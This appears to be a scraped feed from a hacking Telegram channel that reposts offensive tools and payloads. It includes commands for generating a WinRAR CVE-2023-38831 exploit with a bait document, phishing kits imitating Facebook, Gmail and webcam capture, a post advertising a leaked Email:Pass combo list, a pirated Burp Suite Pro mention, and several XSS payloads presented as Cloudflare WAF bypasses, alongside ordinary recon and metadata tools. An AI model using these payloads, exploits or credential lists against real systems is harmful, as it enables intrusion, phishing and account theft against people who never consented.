Please open Telegram to view this post
VIEW IN TELEGRAM
❤10
Generate the default poc for test
python cve-2023-38831-exp-gen.py poc
or
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf noscript.bat poc.rar
python cve-2023-38831-exp-gen.py <bait name> <noscript name> <output name>
to generate your exploit
BugCod3#CVE #Winrar #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡1👍1 1
This tool serves to find the original IP behind websites that have been protected by CloudFlare, the information generated can be useful for further penetration. The information generated by this tool is as follows.
This tool is made with PHP code with very simple programming using several APIs to get maximum results, but this tool does not guarantee 100% to be able to bypass websites that have been protected by CloudFlare. Some websites sometimes cannot be detected by their original IP.
sudo apt install php-curl
cd CloudPeler
./crimeflare.php exemple.com
BugCod3#Cloudflare #Bypass #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4 2⚡1👍1🥰1
Attack Surface Management Platform
Discover hidden assets and vulnerabilities in your environment
Integrate with the leading commercial and open source vulnerability scanners to scan for the latest CVEs and vulnerabilities.
Hacking is a problem that's only getting worse. But, with Sn1per, you can find what you can’t see—hidden assets and vulnerabilities in your environment.
Sn1per is a next-generation information gathering tool that provides automated, deep, and continuous security for organizations of all sizes.
cd Sn1per
bash install.sh
BugCod3#Cybersecurity #Pentesting #Sn1per
Please open Telegram to view this post
VIEW IN TELEGRAM
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.
#Python #PyPhisher
Please open Telegram to view this post
VIEW IN TELEGRAM
It has not yet been valued, but Pavel Drov (Telegram) has also supported this currency.
Its condition is like the beginning of the Toncoin currency, it has no price, try it for free, there is no harm, maybe one day Telegram itself will become valuable like Toncoin.
@notcoin_bot
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2👎1
sudo apt-get -y install php openssh git wget
cd CamPhish
bash camphish.sh
BugCod3#Camera #Hacking #Video #learning
Please open Telegram to view this post
VIEW IN TELEGRAM
BugCod3#shellter #msf #payload #bind
Please open Telegram to view this post
VIEW IN TELEGRAM
Cyber Security Courses, Training, Certifications and Resources
The SANS Promise: Everyone who completes SANS training can apply the skills and knowledge they’ve learned the day they return to work.
#Sans #Courses
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8⚡2👍1 1
This media is not supported in your browser
VIEW IN TELEGRAM
Run Script with Python 2.7
python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml
@LearnExploit#Exploit #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
go get -u github.com/tomnomnom/assetfinder
assetfinder [--subs-only] <domain>
BugCod3#asset #finder #sub #domain
Please open Telegram to view this post
VIEW IN TELEGRAM
Email:Pass
BugCod3#Combo #List #Israel
Please open Telegram to view this post
VIEW IN TELEGRAM
#Deep #Web
Please open Telegram to view this post
VIEW IN TELEGRAM
311138#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7 4⚡1
Media is too big
VIEW IN TELEGRAM
Steghide is steganography program which hides bits of a data file in some of the least significant bits of another file in such a way that the existence of the data file is not visible and cannot be proven.
Steghide is designed to be portable and configurable and features hiding data in bmp, jpeg, wav and au files, blowfish encryption, MD5 hashing of passphrases to blowfish keys, and pseudo-random distribution of hidden bits in the container data.
sudo apt install steghide
BugCod3#Steghide #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3 3⚡1
Media is too big
VIEW IN TELEGRAM
Image::ExifTool is a customizable set of Perl modules plus a full-featured command-line application called exiftool for reading and writing meta information in a wide variety of files, including the maker note information of many digital cameras by various manufacturers such as Canon, Casio, DJI, FLIR, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Nintendo, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Phase One, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon and Sony.
The following modules/packages are recommended for specific features, e.g. decoding compressed and/or encrypted information from the indicated file types, calculating digest values for some information types, etc.:
XLSX, ODP, ODS, ODT, EIP, iWork
sudo apt install libimage-exiftool-perl
BugCod3#Steghide #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
DalFox is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities.
go install github.com/hahwul/dalfox/v2@latest
dalfox [mode] [target] [flags]
dalfox url http://testphp.vulnweb.com/listproducts.php\?cat\=123\&artist\=123\&asdf\=ff \
-b https://your-callback-url
dalfox file urls_file --custom-payload ./mypayloads.txt
cat urls_file | dalfox pipe -H "AuthToken: bbadsfkasdfadsf87"
BugCod3#Go #XSS #Scanner #Vulnerability #BugBounty
Please open Telegram to view this post
VIEW IN TELEGRAM
Cloudflare bypass XSS payloads
Tested On:👩💻
XSS Payloads:
#Exploit #XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Tested On:
XSS Payloads:
for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javanoscript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<noscript/OnLoad="`${prompt``}`">#Exploit #XSS #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3 3⚡2❤2
New xss payload to bypass cloudflare WAF
#XSS #Payload #Bypass #CF #WAF
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
#XSS #Payload #Bypass #CF #WAF
Please open Telegram to view this post
VIEW IN TELEGRAM
haktrails is a Golang client for querying SecurityTrails API data, sponsored by SecurityTrails.
go install -v github.com/hakluke/haktrails@latest
Gather subdomains
cat domains.txt | haktrails subdomains
echo "yahoo.com" | haktrails subdomains
and...
BugCod3#Go #Subdomain #IP #Discovery
Please open Telegram to view this post
VIEW IN TELEGRAM